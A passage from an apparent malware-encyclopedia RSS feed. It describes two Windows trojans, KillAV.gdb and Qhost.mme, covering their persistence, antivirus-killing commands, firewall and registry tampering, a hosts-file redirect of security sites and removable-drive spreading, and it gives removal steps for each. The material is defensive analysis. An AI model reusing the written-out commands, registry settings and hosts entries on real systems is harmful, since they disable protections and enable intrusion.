&lt;p&gt;6. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 11 Sep 2011 23:34:34 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan.Win32.Yakes.buh</guid>
		</item>
		<item>
			<title>Trojan.Win32.KillAV.gdb</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan.Win32.KillAV.gdb</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;It is a trojan program that performs destructive actions on a user's computer. It is a Windows DLL (PE-DLL file). Its size is 9,728 bytes. It is written in C++.
&lt;/p&gt;&lt;p&gt;MD5: 8E10BC3D3033A4FDC987F85C7FFA40FF
&lt;/p&gt;&lt;p&gt;SHA1: 24DD370B3A6FF535A6A2468F9AA4AF801B62A053
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The malicious DLL exports the function called "testall". This function implements a functionality described below.
&lt;/p&gt;&lt;p&gt;If the process "avp.exe" is found in the infected system, the trojan will attempt to unload the following modules from address space of this process: 
&lt;/p&gt;
&lt;pre&gt;
kavbase.kdl
webav.kdl
vlns.kdl
mark.kdl
klavemu.kdl
kjim.kdl
&lt;/pre&gt;
&lt;p&gt;Then the trojan disables an automatic start of the service "avp". For this purpose the trojan runs the command:
&lt;/p&gt;
&lt;pre&gt;sc config avp start= disabled
&lt;/pre&gt;
&lt;p&gt;Then the process "avp.exe" is terminated by using the system utility "taskkill.exe":
&lt;/p&gt;
&lt;pre&gt;taskkill.exe /f/t/im avp.exe
&lt;/pre&gt;
&lt;p&gt;Next the trojan performs search and termination of the following processes:
&lt;/p&gt;
&lt;pre&gt;
avp.exe
safeboxTray.exe
360Safebox.exe
360tray.exe
antiarp.exe
ekrn.exe
RsAgent.exe
mfeann.exe
egui.exe
RavMon.exe
RavMonD.exe
RavTask.exe
CCenter.exe
RavStub.exe
RsTray.exe
ScanFrm.exe
Rav.exe
AgentSvr.exe
CCenter.exe
QQDoctor.exe
McProxy.exe
mcshield.exe
rsnetsvr.exe
naPrdMgr.exe
MpfSrv.exe
MPSVC.exe
MPSVC1.exe
KISSvc.exe
KPfwSvc.exe
kmailmon.exe
KavStart.exe
engineserver.exe
KPFW32.exe
KVSrvXP.exe
ccSetMgr.exe
ccEvtMgr.exe
defwatch.exe
rtvscan.exe
ccapp.exe
vptray.exe
mcupdmgr.exe
mfevtps.exe
mcsysmon.exe
mcmscsvc.exe
mcnasvc.exe
mcagent.exe
vstskmgr.exe
FrameworkService.exe
mcshell.exe
mcinsupd.exe
bdagent.exe
livesrv.exe
vsserv.exe
xcommsvr.exe
ccSvcHst.exe
SHSTAT.exe
McTray.exe
udaterui.exe
KAVStart.exe
Uplive.exe
KWatch.exe
QQDoctorRtp.exe
DrUpdate.exe
rfwsrv.exe
RegGuide.exe
MPSVC2.exe
MPMon.exe
LiveUpdate360.exe
rssafety.exe
KABackReport.exe
KSWebShield.exe
360delays.exe
qutmserv.exe
kaccore.exe
360SoftMgrSvc.exe
360realpro.exe
DSMain.exe
360sd.exe
360rp.exe
ZhuDongFangYu.exe
360safe.exe
&lt;/pre&gt;
&lt;p&gt;In case of finding the processes:
&lt;/p&gt;
&lt;pre&gt;
360rp.exe
ravmond.exe
&lt;/pre&gt;
&lt;p&gt;the trojan stops and deletes the services:
&lt;/p&gt;
&lt;pre&gt;
360rp
rsravmon 
&lt;/pre&gt;
&lt;p&gt;If the process "ekrn.exe" is found, the trojan will delete the service "ekrn" by using the following command:
&lt;/p&gt;
&lt;pre&gt;cmd /c sc delete ekrn
&lt;/pre&gt;
&lt;p&gt;If the process "avp.exe" is found, the trojan will run the commands:
&lt;/p&gt;
&lt;pre&gt;
cmd /c sc config avp start= disabled
taskkill.exe /im avp.exe /f
&lt;/pre&gt;
&lt;p&gt;Thus, the trojan disables an automatic start of the service "avp" as well as terminates the process "avp.exe". 
&lt;/p&gt;&lt;p&gt;After this, the trojan terminates.
&lt;/p&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;2. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 14 Aug 2011 16:53:19 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan.Win32.KillAV.gdb</guid>
		</item>
		<item>
			<title>Trojan.Win32.Qhost.mme</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan.Win32.Qhost.mme</link>
			<description>&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;The description for &lt;b&gt;NewsChannel&lt;/b&gt; was created during beta-test of&amp;nbsp;&amp;laquo;Malware description on&amp;nbsp;demand&amp;raquo; service. Learn more about&amp;nbsp;at: &lt;a href="http://www.dnt-lab.com/en/services"&gt;&lt;nobr&gt;www.dnt-lab.com/en/services&lt;/nobr&gt;&lt;/a&gt;.&lt;/div&gt;
&lt;div style="float: right; margin-left: 10px; margin-bottom: 5px;"&gt;
&lt;table style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;tr style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse;"&gt;
&lt;td colspan="2" style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px; background-color: #f8f8f8;"&gt;
&lt;div align="center"&gt;&lt;b&gt;NewsChannel&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;Last edited:
&lt;/p&gt;
&lt;/td&gt;
&lt;td style="border-width: 1pt; border-style: solid; border-color: gray; border-collapse: collapse; padding-left: 8px; padding-right: 8px;"&gt;
&lt;p&gt;26.5.2012
&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;It is a trojan program that performs destructive actions on a user's computer. It is a Windows application (PE-EXE file). Its size is 134,359 bytes. It is packed with an unknown packer. Unpacked size is about 446 KB. It is written in Delphi.
&lt;/p&gt;&lt;p&gt;md5: 895A62F1F95FDE6B01810A7740549AAD
&lt;/p&gt;&lt;p&gt;sha1: 598B0B98FA25902AE5434AE57127B8294868DD83
&lt;/p&gt;
&lt;table id="toc" class="toc"&gt;&lt;tr&gt;&lt;td&gt;&lt;div id="toctitle"&gt;&lt;h2&gt;Contents&lt;/h2&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li class="toclevel-1 tocsection-1"&gt;&lt;a href="#Installation"&gt;&lt;span class="tocnumber"&gt;1&lt;/span&gt; &lt;span class="toctext"&gt;Installation&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-2"&gt;&lt;a href="#Payload"&gt;&lt;span class="tocnumber"&gt;2&lt;/span&gt; &lt;span class="toctext"&gt;Payload&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-3"&gt;&lt;a href="#Spread_Through_Removable_Devices_and_Network_Resources"&gt;&lt;span class="tocnumber"&gt;3&lt;/span&gt; &lt;span class="toctext"&gt;Spread Through Removable Devices and Network Resources&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="toclevel-1 tocsection-4"&gt;&lt;a href="#Removal_Instructions"&gt;&lt;span class="tocnumber"&gt;4&lt;/span&gt; &lt;span class="toctext"&gt;Removal Instructions&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;script&gt;if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } &lt;/script&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Installation"&gt;Installation&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Once launched, the trojan copies its body to the following files:
&lt;/p&gt;
&lt;pre&gt;
%System%\Default.scr
%System%\config\lsass.exe
%System%\config\Cache\Dasktop.ini
&lt;/pre&gt;
&lt;p&gt;The trojan sets "hidden" attribute for the copy "lsass.exe". 
&lt;/p&gt;&lt;p&gt;In order to start automatically each time you start the system, the trojan creates the links to its executable files in the system registry:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Control Panel\Desktop]
&amp;quot;SCRNSAVE.EXE&amp;quot; = &amp;quot;%System%\Default.scr&amp;quot;
 
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Intel Audio Driver&amp;quot; = &amp;quot;%System%\config\lsass.exe&amp;quot;
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Payload"&gt;Payload&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;In order to counteract to monitoring and debugging tools, the trojan search for the following window classes:
&lt;/p&gt;
&lt;pre&gt;
OLLYDBG
FileMonClass
&lt;/pre&gt;
&lt;p&gt;and devices:
&lt;/p&gt;
&lt;pre&gt;
\\.\SICE
\\.\SIWVID
\\.\NTICE
\\.\REGSYS
\\.\REGVXG
\\.\FILEVXG
\\.\FILEM
\\.\TRW
\\.\ICEEXT
&lt;/pre&gt;
&lt;p&gt;It creates a unique identifier with the following name to control uniqueness of its process:
&lt;/p&gt;
&lt;pre&gt;WOG_M
&lt;/pre&gt;
&lt;p&gt;It blocks booting of a system in "Safe mode" by removing the following registry branches:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\System\CurrentControlSet\Control\SafeBoot\Network]
[HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal]
&lt;/pre&gt;
&lt;p&gt;It turns off notifications of the Windows Security Center by setting the following parameters in the system registry: 
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SOFTWARE\Microsoft\Security Center]
&amp;quot;FirewallDisableNotify&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;FirewallOverride&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;It disables the "Folder Options" item in Windows Explorer:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\Software\Microsoft\Windows\CurrentVersion\policies\explorer\run]
&amp;quot;NoFolderoptions&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;It disables the System Restore:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
&amp;quot;DisableSR&amp;quot; = &amp;quot;1&amp;quot;
 
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\systemrestore]
&amp;quot;DisableSR&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;Launching of the following programs for the current user will be prohibited:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
&amp;quot;DisallowRun&amp;quot; = &amp;quot;1&amp;quot;
 
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Disallowrun]
0 = &amp;quot;avp.exe&amp;quot;
1 = &amp;quot;avz.exe&amp;quot;
2 = &amp;quot;autoruns.exe&amp;quot;
3 = &amp;quot;outpost.exe&amp;quot;
4 = &amp;quot;spidernt.exe&amp;quot;
5 = &amp;quot;SpyDerAgent.exe&amp;quot;
6 = &amp;quot;dwengine.exe&amp;quot;
7 = &amp;quot;spiderui.exe&amp;quot;
8 = &amp;quot;acs.exe&amp;quot;
9 = &amp;quot;op_mon.exe&amp;quot;
10 = &amp;quot;klnagent.exe&amp;quot;
11 = &amp;quot;egui.exe&amp;quot;
12 = &amp;quot;sched.exe&amp;quot;
13 = &amp;quot;avgnt.exe&amp;quot;
14 = &amp;quot;avguard.exe&amp;quot;
15 = &amp;quot;guardgui.exe&amp;quot;
&lt;/pre&gt;
&lt;p&gt;It disables the Windows Firewall:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StardardProfile]
&amp;quot;DisableNotifications&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;DoNotAllowExceptions&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;EnableFirewall&amp;quot; = &amp;quot;0&amp;quot;
&lt;/pre&gt;
&lt;p&gt;It turns on the launching of screensaver and sets the time of its launch:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Control Panel\Desktop]
&amp;quot;ScreenSaveActive&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;ScreenSaveTimeOut&amp;quot; = &amp;quot;100&amp;quot;
&lt;/pre&gt;
&lt;p&gt;The binary file of screensaver is a copy of the trojan.
&lt;/p&gt;&lt;p&gt;It sets the low level of Windows security policy for files with the extensions "exe", "bat", "reg" and "scr" for the purpose of disabling a security messages during opening a file from the "untrusted" source:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
LowRiskFileTypes = &amp;quot;.Exe;.Bat;.Reg;.Scr;&amp;quot;
 
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
SaveZoneInformation = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;The trojan modifies the files:
&lt;/p&gt;
&lt;pre&gt;
%System%\drivers\etc\hosts
%System%\dllcache\hosts
&lt;/pre&gt;
&lt;p&gt;appending to them the following lines:
&lt;/p&gt;
&lt;pre&gt;
127.0.0.1 localhost
174.133.168.212 www.viruslist.com
174.133.168.212 www.kaspersky.ru
174.133.168.212 www.kaspersky.com
174.133.168.212 www.securelist.com
174.133.168.212 z-oleg.com
174.133.168.212 www.trendsecure.com
174.133.168.212 ftp.drweb.com
174.133.168.212 virusinfo.info
174.133.168.212 www.viruslab.ru
174.133.168.212 www.novirus.ru
174.133.168.212 online.drweb.com
174.133.168.212 www.informyx.ru
174.133.168.212 vms.drweb.com
174.133.168.212 stopvirus.ru
174.133.168.212 www.esetnod32.ru
174.133.168.212 devbuilds.kaspersky-labs.com
174.133.168.212 www.agnitum.ru
174.133.168.212 www.drweb.com
174.133.168.212 www.avirus.ru
174.133.168.212 dnl-00.geo.kaspersky.com
174.133.168.212 dnl-01.geo.kaspersky.com
174.133.168.212 dnl-02.geo.kaspersky.com
174.133.168.212 dnl-03.geo.kaspersky.com
174.133.168.212 dnl-04.geo.kaspersky.com
174.133.168.212 dnl-05.geo.kaspersky.com
174.133.168.212 dnl-06.geo.kaspersky.com
174.133.168.212 dnl-07.geo.kaspersky.com
174.133.168.212 dnl-08.geo.kaspersky.com
174.133.168.212 dnl-09.geo.kaspersky.com
174.133.168.212 dnl-10.geo.kaspersky.com
174.133.168.212 dnl-11.geo.kaspersky.com
174.133.168.212 dnl-12.geo.kaspersky.com
174.133.168.212 dnl-13.geo.kaspersky.com
174.133.168.212 dnl-14.geo.kaspersky.com
174.133.168.212 dnl-15.geo.kaspersky.com
174.133.168.212 dnl-16.geo.kaspersky.com
174.133.168.212 dnl-17.geo.kaspersky.com
174.133.168.212 dnl-18.geo.kaspersky.com
174.133.168.212 dnl-19.geo.kaspersky.com
174.133.168.212 dnl-20.geo.kaspersky.com
174.133.168.212 downloads1.kaspersky-labs.com
174.133.168.212 downloads2.kaspersky-labs.com
174.133.168.212 downloads3.kaspersky-labs.com
174.133.168.212 downloads4.kaspersky-labs.com
174.133.168.212 downloads5.kaspersky-labs.com
174.133.168.212 msk1.drweb.com
174.133.168.212 msk2.drweb.com
174.133.168.212 msk3.drweb.com
174.133.168.212 msk4.drweb.com
174.133.168.212 msk5.drweb.com
174.133.168.212 download.eset.com
174.133.168.212 u40.eset.com
174.133.168.212 u41.eset.com
174.133.168.212 u42.eset.com
174.133.168.212 u43.eset.com
174.133.168.212 u44.eset.com
174.133.168.212 u45.eset.com
174.133.168.212 u46.eset.com
174.133.168.212 u47.eset.com
174.133.168.212 u48.eset.com
174.133.168.212 u49.eset.com
174.133.168.212 u50.eset.com
174.133.168.212 u51.eset.com
174.133.168.212 u52.eset.com
174.133.168.212 u53.eset.com
174.133.168.212 u54.eset.com
174.133.168.212 u55.eset.com
174.133.168.212 u56.eset.com
174.133.168.212 u57.eset.com
174.133.168.212 u58.eset.com
174.133.168.212 u59.eset.com
174.133.168.212 um10.eset.com
174.133.168.212 um11.eset.com
174.133.168.212 um12.eset.com
174.133.168.212 um13.eset.com
174.133.168.212 um14.eset.com
174.133.168.212 um15.eset.com
174.133.168.212 um16.eset.com
174.133.168.212 um17.eset.com
174.133.168.212 um18.eset.com
174.133.168.212 um19.eset.com
&lt;/pre&gt;
&lt;p&gt;The trojan reads a path to the hosts file from the registry key:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
&amp;quot;DataBasePath&amp;quot;
&lt;/pre&gt;
&lt;p&gt;Thus, when you try to access those resources the user will be redirected to:
&lt;/p&gt;
&lt;pre&gt;174.133.168.212
&lt;/pre&gt;
&lt;p&gt;After this, the trojan terminates.
&lt;/p&gt;&lt;p&gt;In addition, the trojan disables the display of hidden and system files/directories, as well as display the extensions for registered file types in Windows Explorer. For this purpose it changes the values of the following registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
&amp;quot;Hidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;ShowSuperHidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;HideFileExt&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;It terminates the following processes:
&lt;/p&gt;
&lt;pre&gt;
procexp.exe
procmon.exe
autoruns.exe
KillProcess.exe
PrcInfo.exe
filemon.exe
regmon.exe
msconfig.exe
HiJackThis.exe
avz.exe
phunter.exe
UnlockerAssistant.exe
Unlocker.exe
regedit.exe
servise.exe
OS.exe
Prcview.exe
TaskInfo.exe
egui.exe
sysinspector.exe
klnagent.exe
&lt;/pre&gt;
&lt;p&gt;It looking for the windows with the following class names:
&lt;/p&gt;
&lt;pre&gt;
PROCEXPL
PROCMON_WINDOW_CLASS
Autoruns
AVP.MainWindow
AnVirMainFrame
and the titles of windows:
avast! Antivirus Setup
Display Properties
AVZ antivirus utility
Avira AntiVir Personal - Free Antivirus
Dr.Web Security Space 5.0 - InstallShield Wizard
&lt;/pre&gt;
&lt;p&gt;Then it identify processes that own these windows and terminates them.
&lt;/p&gt;&lt;p&gt;It checks the header of an active window, if it coincides with the following, the trojan will define a process that owns this window and terminate it:
&lt;/p&gt;
&lt;pre&gt;
avast! Antivirus Setup
Свойства: Экран
Антивирусная утилита AVZ
Avira AntiVir Personal - Free Antivirus
Dr.Web Security Space 5.0 - InstallShield Wizard
&lt;/pre&gt;
&lt;p&gt;Also, there is 7 audio fragments in the trojan's resources. These fragments is played during pressing the keys:
&lt;/p&gt;
&lt;pre&gt;
ENTER
BACKSPACE
TAB
ESC
DEL
CAPS LOCK
SPACE
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Spread_Through_Removable_Devices_and_Network_Resources"&gt;Spread Through Removable Devices and Network Resources&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;The trojan сopies its executable file to all writable removable drives connected to the victim's computer:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;the infected partition's name&amp;gt;:\&amp;lt;rnd&amp;gt;.scr
&lt;/pre&gt;
&lt;p&gt;Also the script "Autorun.inf" is created in the root directory of an infected disk:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;the infected partition's name&amp;gt;:\Autorun.inf
&lt;/pre&gt;
&lt;p&gt;&amp;lt;rnd&amp;gt; - random sequence of numbers, for example, "47602". It provides for a copy to run each time a user opens an infected removable disk using "Explorer".
&lt;/p&gt;&lt;p&gt;In addition, the worm applies the "hidden" attribute to all directories in the root of an infected removable disk. After that the worm creates copies of its executable on this disk under hidden directories' names.
&lt;/p&gt;&lt;p&gt;The trojan copies its body to the available network resources by one of the following names:
&lt;/p&gt;
&lt;pre&gt;
XXX.scr                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         Games.scr
Фотки.scr
Порно.scr
Музыка.scr
Не удалять!!!.scr
Новое.scr
Свежак.scr
это я)).scr
Книжки.scr
Антивирусы.scr
Новая папка.scr
сталкер.scr
каспер.scr
жесть.scr
&lt;/pre&gt;
&lt;p&gt;Also, the trojan searches for exe files on available network resources. All found files will be renamed to
&lt;/p&gt;
&lt;pre&gt;zw&amp;lt;the original file name&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;And the attribute "hidden" will be applied to these files.
&lt;/p&gt;&lt;p&gt;Then it creates a copy of its body under the found files' names:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;the original file name&amp;gt;.exe
&lt;/pre&gt;
&lt;p&gt;It also creates shortcuts:
&lt;/p&gt;
&lt;pre&gt;&amp;lt;the original file name&amp;gt;.lnk
&lt;/pre&gt;
&lt;p&gt;for the purpose of launching the trojan copies:
&lt;/p&gt;
&lt;pre&gt;%WindDir%\system32\RunDll32.exe shell32.dll,ShellExec_RunDLL".\&amp;lt;the original file name&amp;gt;.exe"
&lt;/pre&gt;
&lt;h2&gt; &lt;span class="mw-headline" id="Removal_Instructions"&gt;Removal Instructions&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;If your computer was not protected by an antivirus and was infected with this malware, follow these steps to remove it:
&lt;/p&gt;&lt;p&gt;1. Use the Task Manager to determine the PID of the trojan process:
&lt;/p&gt;
&lt;pre&gt;lsass.exe
&lt;/pre&gt;
&lt;p&gt;The trojan process is running on behalf of the current user.
&lt;/p&gt;&lt;p&gt;2. Run the command:
&lt;/p&gt;
&lt;pre&gt;taskkill /pid &amp;lt;PID of the trojan protsess&amp;gt;
&lt;/pre&gt;
&lt;p&gt;3. Delete the following files:
&lt;/p&gt;
&lt;pre&gt;
%System%\Default.scr
%System%\config\lsass.exe
%System%\config\Cache\Dasktop.ini
&lt;/pre&gt;
&lt;p&gt;4. Delete the system registry keys:
&lt;/p&gt;
&lt;pre&gt;

[HKCU\Control Panel\Desktop]
&amp;quot;SCRNSAVE.EXE&amp;quot; = &amp;quot;%System%\Default.scr&amp;quot;

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
&amp;quot;Intel Audio Driver&amp;quot; = &amp;quot;%System%\config\lsass.exe&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Disallowrun]
0 = &amp;quot;avp.exe&amp;quot;
1 = &amp;quot;avz.exe&amp;quot;
2 = &amp;quot;autoruns.exe&amp;quot;
3 = &amp;quot;outpost.exe&amp;quot;
4 = &amp;quot;spidernt.exe&amp;quot;
5 = &amp;quot;SpyDerAgent.exe&amp;quot;
6 = &amp;quot;dwengine.exe&amp;quot;
7 = &amp;quot;spiderui.exe&amp;quot;
8 = &amp;quot;acs.exe&amp;quot;
9 = &amp;quot;op_mon.exe&amp;quot;
10 = &amp;quot;klnagent.exe&amp;quot;
11 = &amp;quot;egui.exe&amp;quot;
12 = &amp;quot;sched.exe&amp;quot;
13 = &amp;quot;avgnt.exe&amp;quot;
14 = &amp;quot;avguard.exe&amp;quot;
15 = &amp;quot;guardgui.exe&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
LowRiskFileTypes = &amp;quot;.exe;.bat;.reg;.scr;&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
SaveZoneInformation = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;5. If necessary, restore the values of the following system registry keys:
&lt;/p&gt;
&lt;pre&gt;
[HKLM\SOFTWARE\Microsoft\Security Center]
&amp;quot;FirewallDisableNotify&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;FirewallOverride&amp;quot; = &amp;quot;1&amp;quot;

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer]
&amp;quot;NoFolderoptions&amp;quot; = &amp;quot;1&amp;quot;

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
&amp;quot;DisableSR&amp;quot; = &amp;quot;1&amp;quot;

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\systemrestore]
&amp;quot;DisableSR&amp;quot; = &amp;quot;1&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
&amp;quot;DisallowRun&amp;quot; = &amp;quot;1&amp;quot;

[HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StardardProfile]
&amp;quot;DisableNotifications&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;DoNotAllowExceptions&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;enableFirewall&amp;quot; = &amp;quot;0&amp;quot;

[HKCU\Control Panel\Desktop]
&amp;quot;ScreenSaveActive&amp;quot; = &amp;quot;1&amp;quot;
&amp;quot;ScreenSaveTimeOut&amp;quot; = &amp;quot;100&amp;quot;

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
&amp;quot;Hidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;ShowSuperHidden&amp;quot; = &amp;quot;0&amp;quot;
&amp;quot;HideFileExt&amp;quot; = &amp;quot;1&amp;quot;
&lt;/pre&gt;
&lt;p&gt;6. Restore the original contents of the files:
&lt;/p&gt;
&lt;pre&gt;
%System%\drivers\etc\hosts
%System%\dllcache\hosts
&lt;/pre&gt;
&lt;p&gt;7. Delete the original trojan file (its location on the infected computer will depend on how the program originally penetrated the victim machine).
&lt;/p&gt;&lt;p&gt;8. Perform a full system scan with an antivirus with updated databases.
&lt;/p&gt;
&lt;div style="width:75%; border-width: 3px; border-style: solid; border-color: #eecc00; background-color: #ffffcc; margin-left: auto; margin-right: auto; margin-top: 15px; margin-bottom: 15px; padding: 15px 15px 15px 15px; font-size: 12pt; line-height: 125%;"&gt;&lt;b&gt;Can't find a description for a specific malware?&lt;/b&gt;&lt;br /&gt;
You can &lt;a href="http://www.dnt-lab.com/en/services"&gt;order a description for any computer malware, virus, trojan or worm&lt;/a&gt;.&lt;/div&gt;
</description>
			<pubDate>Sun, 07 Aug 2011 15:36:23 +0300</pubDate>
			<author>Playrhyba</author>
			<guid>http://www.totalmalwareinfo.com/eng/Trojan.Win32.Qhost.mme</guid>
		</item>
		<item>
			<title>Trojan-Downloader.Java.OpenConnection.er</title>
			<link>http://www.totalmalwareinfo.com/eng/Trojan-Downloader.Java.OpenConnection.er</link>
